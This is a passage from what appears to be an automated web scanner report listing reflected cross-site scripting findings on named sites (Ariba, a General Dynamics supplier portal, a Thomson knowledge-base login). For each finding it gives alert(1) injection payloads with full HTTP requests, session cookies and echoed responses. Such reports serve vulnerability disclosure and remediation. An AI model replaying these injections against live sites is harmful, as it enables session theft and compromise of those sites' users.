Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://connect.ariba.com/AC
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; LANGUAGEID=en; s_cc=true; gpv_pn=%2Fservices%2Fsupport.cfm; s_sq=%5B%5BB%5D%5D; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.17.9.1318961134560; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_ppv=42; ASPSESSIONIDCSDATQAS=IHJNNMFCOMDBIDIKEBEENEHN

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 231
Date: Tue, 18 Oct 2011 18:11:13 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-control: private

Verify user.sUID=https://connect.ariba.com/AC_Home_Page/    <SCRIPT LANGUAGE="JavaScript">
       window.location.href="https://connect.ariba.com1fd54";alert(1)//dfb25cd5db685531b/AC_Login/?IsErr=True&u=a&sc=AC_Home_Page/";
       </SCRIPT>
...[SNIP]...

1.19. https://connect.ariba.com/ASP/Login/AClogin.asp [BaseURL parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://connect.ariba.com
Path:   /ASP/Login/AClogin.asp

Issue detail

The value of the BaseURL request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d315b"%3balert(1)//0cdfa14123c was submitted in the BaseURL parameter. This input was echoed as d315b";alert(1)//0cdfa14123c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ASP/Login/AClogin.asp?BaseURL=connect.ariba.comd315b"%3balert(1)//0cdfa14123c&PortNumber=443&xt=&ssl=on&u=a&sc=AC_Home_Page/ HTTP/1.1
Host: connect.ariba.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://connect.ariba.com/ASP/Login/AClogin.asp?BaseURL=connect.ariba.com&PortNumber=443&xt=&ssl=on&u=a&sc=AC_Home_Page/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; LANGUAGEID=en; s_cc=true; gpv_pn=%2Fservices%2Fsupport.cfm; s_sq=%5B%5BB%5D%5D; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.17.9.1318961134560; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_ppv=42; ASPSESSIONIDCSDATQAS=IHJNNMFCOMDBIDIKEBEENEHN

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 225
Date: Tue, 18 Oct 2011 18:11:15 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-control: private

Verify user.sUID=https://connect.ariba.com/AC_Home_Page/    <SCRIPT LANGUAGE="JavaScript">
       window.location.href="https://connect.ariba.comd315b";alert(1)//0cdfa14123c/AC_Login/?IsErr=True&u=a&sc=AC_Home_Page/";
       </SCRIPT>
...[SNIP]...

1.20. https://connect.ariba.com/ASP/Login/AClogin.asp [sc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://connect.ariba.com
Path:   /ASP/Login/AClogin.asp

Issue detail

The value of the sc request parameter is copied into the HTML document as plain text between tags. The payload 1086f<script>alert(1)</script>1d31d8de98032848c was submitted in the sc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /ASP/Login/AClogin.asp?BaseURL=connect.ariba.com&PortNumber=443&xt=&ssl=on&u=a&sc=AC_Home_Page/1086f<script>alert(1)</script>1d31d8de98032848c&txtUserName=&prefix=ext_&txtPassword=&submit1=Login HTTP/1.1
Host: connect.ariba.com
Connection: keep-alive
Cache-Control: max-age=0
Origin: https://connect.ariba.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://connect.ariba.com/AC
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; LANGUAGEID=en; s_cc=true; gpv_pn=%2Fservices%2Fsupport.cfm; s_sq=%5B%5BB%5D%5D; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.17.9.1318961134560; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_ppv=42; ASPSESSIONIDCSDATQAS=IHJNNMFCOMDBIDIKEBEENEHN

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 291
Date: Tue, 18 Oct 2011 18:11:23 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-control: private

Verify user.sUID=https://connect.ariba.com/AC_Home_Page/1086f<script>alert(1)</script>1d31d8de98032848c    <SCRIPT LANGUAGE="JavaScript">
       window.location.href="https://connect.ariba.com/AC_Login/?IsEr
...[SNIP]...

1.21. https://connect.ariba.com/ASP/Login/AClogin.asp [sc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://connect.ariba.com
Path:   /ASP/Login/AClogin.asp

Issue detail

The value of the sc request parameter is copied into the HTML document as plain text between tags. The payload 943b7<script>alert(1)</script>8ca96b5b20 was submitted in the sc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ASP/Login/AClogin.asp?BaseURL=connect.ariba.com&PortNumber=443&xt=&ssl=on&u=a&sc=AC_Home_Page/943b7<script>alert(1)</script>8ca96b5b20 HTTP/1.1
Host: connect.ariba.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://connect.ariba.com/ASP/Login/AClogin.asp?BaseURL=connect.ariba.com&PortNumber=443&xt=&ssl=on&u=a&sc=AC_Home_Page/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; LANGUAGEID=en; s_cc=true; gpv_pn=%2Fservices%2Fsupport.cfm; s_sq=%5B%5BB%5D%5D; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.17.9.1318961134560; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_ppv=42; ASPSESSIONIDCSDATQAS=IHJNNMFCOMDBIDIKEBEENEHN

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 277
Date: Tue, 18 Oct 2011 18:11:22 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-control: private

Verify user.sUID=https://connect.ariba.com/AC_Home_Page/943b7<script>alert(1)</script>8ca96b5b20    <SCRIPT LANGUAGE="JavaScript">
       window.location.href="https://connect.ariba.com/AC_Login/?IsErr=True&
...[SNIP]...

1.22. https://connect.ariba.com/ASP/Login/AClogin.asp [sc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://connect.ariba.com
Path:   /ASP/Login/AClogin.asp

Issue detail

The value of the sc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 352dc"%3balert(1)//94c491ca4d9 was submitted in the sc parameter. This input was echoed as 352dc";alert(1)//94c491ca4d9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ASP/Login/AClogin.asp?BaseURL=connect.ariba.com&PortNumber=443&xt=&ssl=on&u=a&sc=AC_Home_Page/352dc"%3balert(1)//94c491ca4d9 HTTP/1.1
Host: connect.ariba.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://connect.ariba.com/ASP/Login/AClogin.asp?BaseURL=connect.ariba.com&PortNumber=443&xt=&ssl=on&u=a&sc=AC_Home_Page/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; LANGUAGEID=en; s_cc=true; gpv_pn=%2Fservices%2Fsupport.cfm; s_sq=%5B%5BB%5D%5D; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.17.9.1318961134560; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_ppv=42; ASPSESSIONIDCSDATQAS=IHJNNMFCOMDBIDIKEBEENEHN

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 253
Date: Tue, 18 Oct 2011 18:11:20 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-control: private

Verify user.sUID=https://connect.ariba.com/AC_Home_Page/352dc";alert(1)//94c491ca4d9    <SCRIPT LANGUAGE="JavaScript">
       window.location.href="https://connect.ariba.com/AC_Login/?IsErr=True&u=a&sc=AC_Home_Page/352dc";alert(1)//94c491ca4d9";
       </SCRIPT>
...[SNIP]...

1.23. https://connect.ariba.com/ASP/Login/AClogin.asp [sc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://connect.ariba.com
Path:   /ASP/Login/AClogin.asp

Issue detail

The value of the sc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8e2c"%3balert(1)//26a07ecc2f93fd1f3 was submitted in the sc parameter. This input was echoed as e8e2c";alert(1)//26a07ecc2f93fd1f3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ASP/Login/AClogin.asp?BaseURL=connect.ariba.com&PortNumber=443&xt=&ssl=on&u=a&sc=AC_Home_Page/e8e2c"%3balert(1)//26a07ecc2f93fd1f3&txtUserName=&prefix=ext_&txtPassword=&submit1=Login HTTP/1.1
Host: connect.ariba.com
Connection: keep-alive
Cache-Control: max-age=0
Origin: https://connect.ariba.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://connect.ariba.com/AC
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; LANGUAGEID=en; s_cc=true; gpv_pn=%2Fservices%2Fsupport.cfm; s_sq=%5B%5BB%5D%5D; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.17.9.1318961134560; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_ppv=42; ASPSESSIONIDCSDATQAS=IHJNNMFCOMDBIDIKEBEENEHN

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 265
Date: Tue, 18 Oct 2011 18:11:20 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-control: private

Verify user.sUID=https://connect.ariba.com/AC_Home_Page/e8e2c";alert(1)//26a07ecc2f93fd1f3    <SCRIPT LANGUAGE="JavaScript">
       window.location.href="https://connect.ariba.com/AC_Login/?IsErr=True&u=a&sc=AC_Home_Page/e8e2c";alert(1)//26a07ecc2f93fd1f3";
       </SCRIPT>
...[SNIP]...

1.24. https://connect.ariba.com/ASP/Login/AClogin.asp [u parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://connect.ariba.com
Path:   /ASP/Login/AClogin.asp

Issue detail

The value of the u request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33e77"%3balert(1)//cbbd67af68b was submitted in the u parameter. This input was echoed as 33e77";alert(1)//cbbd67af68b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ASP/Login/AClogin.asp?BaseURL=connect.ariba.com&PortNumber=443&xt=&ssl=on&u=a33e77"%3balert(1)//cbbd67af68b&sc=AC_Home_Page/ HTTP/1.1
Host: connect.ariba.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://connect.ariba.com/ASP/Login/AClogin.asp?BaseURL=connect.ariba.com&PortNumber=443&xt=&ssl=on&u=a&sc=AC_Home_Page/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; LANGUAGEID=en; s_cc=true; gpv_pn=%2Fservices%2Fsupport.cfm; s_sq=%5B%5BB%5D%5D; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.17.9.1318961134560; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_ppv=42; ASPSESSIONIDCSDATQAS=IHJNNMFCOMDBIDIKEBEENEHN

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 234
Date: Tue, 18 Oct 2011 18:11:17 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-control: private

Verify user.sUID=https://connect.ariba.com/home/1,1009,45,00.html    <SCRIPT LANGUAGE="JavaScript">
       window.location.href="https://connect.ariba.com/AC_Login/?IsErr=True&u=a33e77";alert(1)//cbbd67af68b&sc=AC_Home_Page/";
       </SCRIPT>
...[SNIP]...

1.25. https://connect.ariba.com/ASP/Login/AClogin.asp [u parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://connect.ariba.com
Path:   /ASP/Login/AClogin.asp

Issue detail

The value of the u request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9080"%3balert(1)//fae7de21ea471ed0d was submitted in the u parameter. This input was echoed as b9080";alert(1)//fae7de21ea471ed0d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ASP/Login/AClogin.asp?BaseURL=connect.ariba.com&PortNumber=443&xt=&ssl=on&u=ab9080"%3balert(1)//fae7de21ea471ed0d&sc=AC_Home_Page/&txtUserName=&prefix=ext_&txtPassword=&submit1=Login HTTP/1.1
Host: connect.ariba.com
Connection: keep-alive
Cache-Control: max-age=0
Origin: https://connect.ariba.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://connect.ariba.com/AC
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274EDF9B8515B7C7-400001A80002D794[CE]; LANGUAGEID=en; s_cc=true; gpv_pn=%2Fservices%2Fsupport.cfm; s_sq=%5B%5BB%5D%5D; __utma=128315228.16618860.1318960999.1318960999.1318960999.1; __utmb=128315228.17.9.1318961134560; __utmc=128315228; __utmz=128315228.1318960999.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_ppv=42; ASPSESSIONIDCSDATQAS=IHJNNMFCOMDBIDIKEBEENEHN

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 240
Date: Tue, 18 Oct 2011 18:11:16 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-control: private

Verify user.sUID=https://connect.ariba.com/home/1,1009,45,00.html    <SCRIPT LANGUAGE="JavaScript">
       window.location.href="https://connect.ariba.com/AC_Login/?IsErr=True&u=ab9080";alert(1)//fae7de21ea471ed0d&sc=AC_Home_Page/";
       </SCRIPT>
...[SNIP]...

1.26. https://cvmas13.cvmsolutions.com/gd/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://cvmas13.cvmsolutions.com
Path:   /gd/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57765"><script>alert(1)</script>cb3cba300c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gd/?57765"><script>alert(1)</script>cb3cba300c5=1 HTTP/1.1
Host: cvmas13.cvmsolutions.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/search?gcx=c&sourceid=chrome&ie=UTF-8&q=reuters+supplier#q=supplier+registration&hl=en&tbo=1&prmd=imvns&ei=M6WdTpv5BKjniAK1j5HXCQ&start=10&sa=N&bav=on.2,or.r_gc.r_pw.,cf.osb&fp=67ad93a5206fb0d0&biw=1206&bih=911
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 18 Oct 2011 17:51:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 31771
Content-Type: text/html
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >

<HTML xmlns:ntb>
<HEAD>
<META http-equiv="Content-Type" content="text/html; charset=ISO 8859-1">
<TITLE>General Dynamics - Sup
...[SNIP]...
<form method="post" action="default.asp?57765"><script>alert(1)</script>cb3cba300c5=1" name="x_LoginForm" ID="Form1">
...[SNIP]...

1.27. http://kbportal.thomson.com/display/2/loginSecure.aspx [catURL parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kbportal.thomson.com
Path:   /display/2/loginSecure.aspx

Issue detail

The value of the catURL request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf7e3"><script>alert(1)</script>b7fec3d043 was submitted in the catURL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /display/2/loginSecure.aspx?cpid=24&t=&aid=&searchstring=&searchtype=&searchby=&cat=&catURL=cf7e3"><script>alert(1)</script>b7fec3d043 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://kbportal.thomson.com/display/2/loginSecureFrame.aspx?cpid=24&c=&cpc=&cid=&t=&aid=&cat=&catURL=&r=0.585381746292114
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: kbportal.thomson.com
Proxy-Connection: Keep-Alive
Cookie: BIGipServerKB-80=428295335.20480.0000; ASP.NET_SessionId=f3pzgl45ahud4e55fonbxneh; PortalSettings=cpId~24|ClientId~12|DisplayMode~2|AutoComplete~False|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~eeeef4|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/12/23/styles.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December; IWICategory=IWICategory=

Response

HTTP/1.1 200 OK
Date: Tue, 18 Oct 2011 15:29:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 2082


<!doctype html public "-//w3c//dtd xhtml 1.0 transitional//en" "http://www.w3.org/tr/xhtml1/dtd/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>West Research A
...[SNIP]...
<input type="hidden" name="catURL" value="cf7e3"><script>alert(1)</script>b7fec3d043">
...[SNIP]...

1.28. http://kbportal.thomson.com/display/2/loginSecure.aspx [searchby parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kbportal.thomson.com
Path:   /display/2/loginSecure.aspx

Issue detail

The value of the searchby request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd5dd"><script>alert(1)</script>9850b6a53d3 was submitted in the searchby parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /display/2/loginSecure.aspx?cpid=24&t=&aid=&searchstring=&searchtype=&searchby=fd5dd"><script>alert(1)</script>9850b6a53d3&cat=&catURL= HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://kbportal.thomson.com/display/2/loginSecureFrame.aspx?cpid=24&c=&cpc=&cid=&t=&aid=&cat=&catURL=&r=0.585381746292114
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: kbportal.thomson.com
Proxy-Connection: Keep-Alive
Cookie: BIGipServerKB-80=428295335.20480.0000; ASP.NET_SessionId=f3pzgl45ahud4e55fonbxneh; PortalSettings=cpId~24|ClientId~12|DisplayMode~2|AutoComplete~False|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~eeeef4|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/12/23/styles.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December; IWICategory=IWICategory=

Response

HTTP/1.1 200 OK
Date: Tue, 18 Oct 2011 15:29:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 2083


<!doctype html public "-//w3c//dtd xhtml 1.0 transitional//en" "http://www.w3.org/tr/xhtml1/dtd/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>West Research A
...[SNIP]...
<input type="hidden" name="searchby" value="fd5dd"><script>alert(1)</script>9850b6a53d3">
...[SNIP]...

1.29. http://kbportal.thomson.com/display/2/loginSecure.aspx [searchstring parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kbportal.thomson.com
Path:   /display/2/loginSecure.aspx

Issue detail

The value of the searchstring request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d027e"><script>alert(1)</script>802d14f2218 was submitted in the searchstring parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /display/2/loginSecure.aspx?cpid=24&t=&aid=&searchstring=d027e"><script>alert(1)</script>802d14f2218&searchtype=&searchby=&cat=&catURL= HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://kbportal.thomson.com/display/2/loginSecureFrame.aspx?cpid=24&c=&cpc=&cid=&t=&aid=&cat=&catURL=&r=0.585381746292114
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: kbportal.thomson.com
Proxy-Connection: Keep-Alive
Cookie: BIGipServerKB-80=428295335.20480.0000; ASP.NET_SessionId=f3pzgl45ahud4e55fonbxneh; PortalSettings=cpId~24|ClientId~12|DisplayMode~2|AutoComplete~False|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~eeeef4|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/12/23/styles.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December; IWICategory=IWICategory=

Response

HTTP/1.1 200 OK
Date: Tue, 18 Oct 2011 15:29:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 2083


<!doctype html public "-//w3c//dtd xhtml 1.0 transitional//en" "http://www.w3.org/tr/xhtml1/dtd/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>West Research A
...[SNIP]...
<input type="hidden" name="searchstring" value="d027e"><script>alert(1)</script>802d14f2218">
...[SNIP]...

1.30. http://kbportal.thomson.com/display/2/loginSecure.aspx [searchtype parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://kbportal.thomson.com
Path:   /display/2/loginSecure.aspx

Issue detail

The value of the searchtype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1aa7"><script>alert(1)</script>d1bc6a57430 was submitted in the searchtype parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /display/2/loginSecure.aspx?cpid=24&t=&aid=&searchstring=&searchtype=e1aa7"><script>alert(1)</script>d1bc6a57430&searchby=&cat=&catURL= HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://kbportal.thomson.com/display/2/loginSecureFrame.aspx?cpid=24&c=&cpc=&cid=&t=&aid=&cat=&catURL=&r=0.585381746292114
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: kbportal.thomson.com
Proxy-Connection: Keep-Alive
